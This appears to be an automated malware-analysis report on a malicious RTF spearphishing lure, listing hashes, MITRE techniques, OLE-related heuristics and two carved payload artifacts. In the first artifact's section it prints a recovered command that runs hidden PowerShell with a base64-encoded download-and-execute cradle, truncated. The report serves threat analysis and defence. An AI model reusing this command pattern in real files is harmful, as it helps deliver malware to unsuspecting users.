RTF malware analysis — malicious · a9b1d3a89681a72f

MALICIOUS

RTF

1.82 MB Created: 2011-04-09 19:44:00 Authoring application: LibreOffice/5.1.6.2$Linux_X86_64 LibreOffice_project/07ac168c60a517dba0f0d7bc7540f5afa45f0909 First seen: 2019-11-20

MD5: 6a4025fd8a8ff8f3aaae91ead0cb81b0 SHA-1: f5ccd073c570ed05d3125b4df7a434ab7eb83a6e SHA-256: a9b1d3a89681a72fee71747bdd6cdd85acff764162ebbed85e66d66cb16456b1

160 Risk Score

Malware Insights

MITRE ATT&CK

T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The RTF file contains embedded OLE objects with large amounts of hex-encoded data, flagged as suspicious. The document body is crafted as a seemingly official invitation for a briefing, likely intended to trick the recipient into activating the embedded object. The embedded artifacts are likely payloads, potentially containing shellcode or PowerShell commands, which are then executed.

Heuristics 5

\objupdate forces OLE activation high RTF_OBJUPDATE

RTF contains \objupdate — forces automatic OLE object instantiation when the document is opened, bypassing user interaction. Almost exclusively seen in Equation Editor exploit documents.
Large hex data blocks in OLE object high RTF_EXCESSIVE_HEX

RTF contains ~1854KB of hex-encoded data inside \objdata sections — may hide a payload
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
OLE object data medium RTF_OBJDATA

RTF contains 2 \objdata section(s) — embedded OLE objects
Embedded OLE object medium RTF_OBJEMB

RTF contains \objemb — embedded OLE object

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`objdata_00_off00018536.bin`	rtf-objdata-decoded	RTF \objdata at offset 0x18536	900262 bytes
SHA-256: `9cd522c9daab6e286ceb2d814fbc1d344aee046815fe07284c4bd2179a02118a`
Detection ClamAV: No threats found Obfuscation or payload: likely Static shellcode analysis recovered command string(s): WScript.Shell").Run("powershell -noprofile -noni -W Hidden -enc aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAHMAeQBzAHQAZQBtAC4AbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4 Carved artifact contains a PowerShell -EncodedCommand style payload.
`objdata_01_off001cfea8.bin`	rtf-objdata-decoded	RTF \objdata at offset 0x1CFEA8	1721 bytes
SHA-256: `75bc52804f0f35bd3091f5546d648601749a492a0121d7ad31f253453d763557`
Detection ClamAV: No threats found Obfuscation or payload: likely Static shellcode analysis found candidate code region(s). Indicators: SC_PEB_ACCESS

Open this report in the interactive analyzer, or submit your own file for analysis.